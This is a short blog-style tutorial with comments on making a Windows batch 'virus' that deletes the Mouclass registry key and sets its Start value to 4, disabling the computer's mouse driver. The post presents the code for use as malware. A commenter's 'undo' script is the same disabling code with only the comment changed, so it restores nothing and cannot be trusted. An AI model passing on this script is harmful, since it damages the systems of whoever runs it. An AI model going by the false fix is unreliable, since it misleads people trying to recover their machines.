How To Make a Virus That disables The Mouse of your Computer !
Just Follow bellow Steps !
- Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
- Save this file as virus.bat
- Done you just created your virus.
who to undo this?
ReplyDeleteBrother Its A Virus and i don't think you are gonna try it on your self !
ReplyDeletewell about how to undo it u'll just have to follow these steps ..
Step 1 : Open Notepad again
Step 2 : Copy bellow code
" rem ---------------------------------
rem Enable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem --------------------------------- "
I just changed Disable into Enable mouse And save it as anything.bad
Step 3 : You Are Done now enjoy ! :D